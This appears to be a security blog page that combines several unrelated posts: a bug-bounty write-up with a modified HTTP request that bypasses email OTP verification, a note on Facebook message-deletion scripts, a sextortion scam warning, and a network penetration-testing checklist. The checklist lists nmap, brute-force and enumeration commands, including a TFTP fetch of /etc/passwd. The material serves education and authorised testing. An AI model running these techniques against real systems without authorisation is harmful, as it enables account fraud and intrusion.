How to Bypass 2FA via Forced Browsing?

Today I would like to share one of the awesome findings by my fellow researcher friend that he came across in one of the private programs, where he was able to bypass the email verification phase implemented by the application.

Before getting started let me tell you about –

Forced Browsing:

Forced browsing is an attack technique against badly protected websites and web applications, which allows the attacker to access resources that they should not be able to access. Forced browsing is a common web application security issue caused by careless coding.

Read more about Forced Browsing here

Let’s get started::

let’s consider the target as redacted.com

Normal SIGNUP flow:

In order to create a new account, the user has to enter the 6 Digit OTP sent to the email address. Only if the user enters a valid OTP then a valid account will be created for that email address.

But, I observed that via forced browsing it is possible to create a valid account using any email address without entering the OTP.

Exploitation:

1) Navigate to the signup page
2) click on signup with email
3) Fill all the details like username, email address & password.
4) Now, Turn ON the burp Intercept.
5) Click on Create account
6) Capture the particular POST Request made to the endpoint POST /_api/signup/verify

Now Remove the /verify from the POST Request

In the body of that post request add “password”:”anypassword” without any syntax mistakes. The final request should be like as shown below

POST /_ajax/signup HTTP/1.1
Host: www.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.redacted.com/en_in/
Content-Type: application/json;charset=UTF-8
Content-Length: 94
Origin: https://www.redacted.com
DNT: 1
Connection: close

{“xxxx”:”xxxxx”,”sxxxxe”:”xx-xx-xx”,”email”:”[email protected]”,”password”:”[email protected]}

Pass the modified request to the server.

Now, navigate to the login page and login using email address and password.

Hope you guys enjoyed it!

Delete All Facebook Messages 2021

How To Delete All Facebook Messages At Once? Working Updated Script

Most of the extensions are stopped working or just spam about the automation of Facebook message delete So I made 2 Imacros scripts to automate the process. It will wipe out your inbox in few minutes.
Quite easy to use. You need to install Imacros in your browser. You can use any browser Chrome or Firefox. I prefer chorme for a smooth process.
If you don’t know how to install Imacros plugin, then you can simply google it. I don’t want to make this thread long to read.
Now you need to import 2 scripts in your Imacros. Or you can just edit the default bookmarks in Imacros. Just replace the code with my code.
After importing the scripts Open messenger, and then go to the All Conversations page.
Here you need to just run the script in a loop. Set the loop value to 100 and relax it will wipe out your inbox.
If one stopped working then run the other script, and then after 100 loops again run the first script.
fake video call honey trap

Beware! New Scam In Pandemic Which Involves Fake Video Calls

WARNING: Accepting friend requests from strangers on Facebook could result in loss of reputation and money. It starts with harmless text conversations and then…

There’s a new scam in town and this one involves erotic video calling.

The gang targets only men but women are enlisted to set the trap. At first, they befriend the men through Facebook chats, from fake accounts. After texting for a while, the woman who is a part of the gang, video calls the man and starts stripping off her clothes, while encouraging him to do the same. The man follows suit and has no idea that the call is being recorded. Then, with their naked video recordings as evidence, the gang blackmails the victim, threatening to upload their photos on social media and send them to their friends and relatives.

Earlier they used to honey trap people but trapping them through video calls is much easier and this has increased. They often play videos of naked women, but mostly men are the masterminds.
— Senior police officer at CEN police station

Cyber Security expert Rakshi Tondon also mentioned this honey trap in his recent LinkedIn post. Watch the full video for a better understanding of the incidents.

 

Advice from Cyber Crime police:

  • Lock your social media accounts and don’t accept requests from unknowns.
  • Do not text or respond to unknown numbers or answer video calls from unknowns.
  • Hide your camera with your finger if you are answering such calls.
  • Report such crimes immediately to https://cybercrime.gov.in/

Remember these criminals are being easily caught. Last year also a lot of such incidents happen and the gangs were traced successfully. But still, keep your privacy and do not trust unknowns.

Stay Safe.

network security vapt

Network Security VAPT Checklist | Updated 2020

I am working in Network Security domain from last 2 years and i have done several Network Security audits which contains Vulnerablity Assessment and Penetration Testing both. So, there are very few technical network security assessment checklist i have made.

Lets talk about the scope first. If you are given a 1000 machines to perform VAPT, then here is your scope. Single machine can have 65535 ports open. Any single port can deploy any service software from the world. For example FTP can be run on smartftp, pureftpd etc. Any single FTP software version (for example pureftpd 1.0.22) can have number of vulnerabilities available. So if you multiply all of these, then it is impossible for any auditor to go ahead and probe all ports manually and find services manually. Even if he/she is able to do it, it is impossible to check all vulnerabilities that are pertaining to a single port of a single machine. Hence we have to rely on scanners such as nexpose, nessus, openvas, coreimpact etc. Here are some quick tools and test cases that one can perform on commonly found ports in the network pentest.

  • Identify live hosts

o   Ping

o   Hping

o   Nmap

  • Identify OS type

o   Nmap

o   Xprobe2

o   Banner grabbing using telnet, nc (netcat)

  • Port scan

o   Nmap full SYN scan with verbose mode and service detection and disabling ping scan. Export normal and greppable output for future use.

  • nmap -Pn -p- -sV X.X.X.X -v -sS -oG nmap_grepable_SYN -oN nmap_normal_SYN

o   Nmap top 1000 UDP scan with verbose mode and service detection and disabling ping scan. Export normal and greppable output for future use.

  • nmap -Pn -top-ports=1000 -sV X.X.X.X -v -sS -oG nmap_grepable_UDP -oN nmap_normal_UDP

VA (Vulnerability Assessment)

o   Use nessus with below profile

  • DoS disabled
  • Web scan enabled
  • SSL scan on every ports instead of known ports
  • Enable TCP and UDP scan
  • Only give open ports’ list in the configuration that were found by nmap including TCP and UDP rather than full ports in order to save time particularly number of IPs are more and less time for audit and report.

o   Use Nexpose

o   Use OpenVAS

o   Use nmap scanner on specific open ports using below command.

  • For example port 22 (SSH) is open and you want to run all scripts pertaining to SSH then use below command:

Nmap -Pn -sS -p22 --script ssh* -v

In case if you are not sure about exact script name you can use * in order to run all scripts that starts with the ‘ssh’ keyword.

  • Audit SSL

o   Use openssl, sslyze tools to find below issues within SSL.

  • Self-signed certificate
  • SSL version 2 and 3 detection
  • Weak hashing algorithm
  • Use of RC4 and CBC ciphers
  • Logjam issue
  • Sweet32 issue
  • Certificate expiry
  • Openssl ChangeCipherSec issue
  • POODLE vulnerability
  • Openssl heartbleed issue
  • Check for default passwords in server/device/service documentation

o   Lets say during your port scan or VA you found some services running on the server for example: cisco, brocad fabric OS, sonicwall firewall, apache tomcat manager. Then for these services Google what are the default configuration administrative username and password. Try those in your login and check your luck.

  • Hunting some common ports

o   DNS (53) UDP

  • Examine domain name system (DNS) using dnsenum, nslookup, dig and fierce tool
  • Check for zone transfer
  • Bruteforce subdomain using fierce tool
  • Run all nmap scripts using following command: nmap -Pn -sU -p53 --script dns* -v
  • Banner grabbing and finding publicly known exploits
  • Check for DNS amplification attack

o   SMTP (25) TCP

  • Check for SMTP open relay
  • Check for email spoofing
  • Check for username enumeration using VRFY command
  • Banner grabbing and finding publicly known exploits
  • Send modified cryptors and check if SMTP gateway is enable to detect and block it?
  • Run all nmap script using following command: nmap -Pn -sS -p25 --script smtp* -v

o   SNMP (161) UDP

  • Check for default community strings ‘public’ & ‘private’ using snmpwalk and snmpenum.pl script.
  • Banner grabbing and finding publicly known exploits
  • Perform MIG enumeration.
  • .1.3.6.1.2.1.1.5 Hostnames
  • .1.3.6.1.4.1.77.1.4.2 Domain Name
  • .1.3.6.1.4.1.77.1.2.25 Usernames
  • .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
  • .1.3.6.1.4.1.77.1.2.27 Share Information

o   SSH (22) TCP

  • Banner grabbing and finding publicly known exploits
  • Check if that supports sshv1 or not.
  • Bruteforce password using hydra and medusa
  • Check if it supports weak CBC ciphers and hmac algorithms using ssh2-enum-algos.nse nmap script.
  • Run all nmap scripts using following command: nmap -Pn -sS -p22 --script ssh* -v

o   Cisco VPN (500) UDP

  • Check for aggressive and main mode enable using ikescan tool.
  • Enumeration using ikeprobe tool
  • Check for VPN group and try to crack PSK in order to get credentials to login into the VPN service through web panel.

o   SMB (445,137,139) TCP

o   FTP (21) TCP

  • Run all nmap script using following command: nmap -Pn -sS -p21 --script ftp* -v
  • Check for cleartext password submission for ftp login
  • Check for anonymous access using username and password as anonymous:anonymous
  • Banner grabbing and finding publicly known exploits
  • Bruteforce FTP password using hydra and medusa

o   Telnet (23) TCP

  • Banner grabbing and finding publicly known exploits
  • Bruteforce telnet password
  • Run following nmap scripts
  • telnet-brute.nse
  • telnet-encryption.nse
  • telnet-ntlm-info.nse

o   TFTP (69) UDP

  • TFTP Enumeration
  • tftp ip_address PUT local_file
  • tftp ip_address GET conf.txt (or other files)
  • tftp – i GET /etc/passwd (old Solaris)
  • Bruteforce TFTP using TFTP bruteforcer tool
  • Run tftp-enum.nse nmap script
  • Banner grabbing and finding publicly known exploits

o   RPC (111) TCP/UDP

  • Banner grabbing and finding publicly known exploits
  • Run following nmap scripts
  • bitcoinrpc-info.nse
  • metasploit-msgrpc-brute.nse
  • metasploit-xmlrpc-brute.nse
  • msrpc-enum.nse
  • nessus-xmlrpc-brute.nse
  • rpcap-brute.nse
  • rpcap-info.nse
  • rpc-grind.nse
  • rpcinfo.nse
  • xmlrpc-methods.nse
  • Perform RPC enumeration using rcpinfo tool
  • Check for the NFS folders so that data could be exported using showmount -e command.

o   NTP (123) UDP

  • Perform NTP enumeration using below commands:
  • ntpdc -c monlist IP_ADDRESS
  • ntpdc -c sysinfo IP_ADDRESS
  • Run all nmap scripts using nmap -Pn -sS -p21 --script ntp* -v

o   HTTP/HTTPs (443,80,8080,8443) TCP

  • Banner grabbing using burp response
  • Run Nikto and dirb
  • Run all nmap scripts using following command nmap -Pn -sS -p21 --script http* -v
  • Banner grabbing and finding publicly known exploits

o   SQL Server (1433,1434, 3306) TCP

  • Banner grabbing and finding publicly known exploits
  • Bruteforce and perform other operation using following tools:
  • Piggy
  • SQLping
  • SQLpoke
  • SQLrecon
  • SQLver
  • Run following nmap scripts:
  • ms-sql-brute.nse
  • ms-sql-config.nse
  • ms-sql-dac.nse
  • ms-sql-dump-hashes.nse
  • ms-sql-empty-password.nse
  • ms-sql-hasdbaccess.nse
  • ms-sql-info.nse
  • ms-sql-ntlm-info.nse
  • ms-sql-query.nse
  • ms-sql-tables.nse
  • ms-sql-xp-cmdshell.nse
  • pgsql-brute.nse
  • For MYSQL default username is root and password is

o   Oracle (1521) TCP

  • Enumeration using following tools
  • Tnsver [host] [port]
  • Tnscmd

o   perl tnscmd.pl -h ip_address

o   perl tnscmd.pl version -h ip_address

o   perl tnscmd.pl status -h ip_address

  • Enumeration & Bruteforce using below nmap scripts:
  • oracle-brute.nse
  • oracle-brute-stealth.nse
  • oracle-enum-users.nse
  • oracle-sid-brute.nse
  • oracle-tns-version.nse

o   RDP (3389) TCP

  • Perform enumeration via connecting and checking login screen. Gather all active user’s name and domain/group name.
  • Perform RDP cryptography check using RDP-sec-check.pl script.
  • Run following nmap script:
  • rdp-enum-encryption.nse
  • rdp-vuln-ms12-020.nse

o   SIP (5060)

  • Enumeration through following commands:
  • Sipflanker - python sipflanker.py 192.168.1-254
  • Sipscan - Smap - smap -l IP_Address